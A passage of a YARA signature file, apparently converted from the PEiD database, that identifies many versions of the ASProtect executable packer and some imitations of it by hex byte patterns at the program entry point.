PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n $b = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 }\r\n $b = { 60 E9 ?? 05 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_10_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 01 00 00 00 90 5D 81 ED ?? ?? ?? 00 BB ?? ?? ?? 00 03 DD 2B 9D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_V2X_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC1_additional: PEiD\r\n{\r\n strings:\r\n $a = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_MTE_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n $b = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v21x: PEiD\r\n{\r\n strings:\r\n $a = { BB E9 60 9C FC BF B9 F3 AA 9D 61 C3 55 8B }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASProtect_10_FEUERRADER: PEiD\r\n{\r\n strings:\r\n $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E9 ?? 04 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_20: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 1B E9 }\r\n $b = { 90 60 E9 ?? 04 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_20_additional: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_BRS_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? 05 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x: PEiD\r\n{\r\n strings:\r\n $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 C3 AA ?? }\r\n $b = { 68 01 ?? ?? ?? C3 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 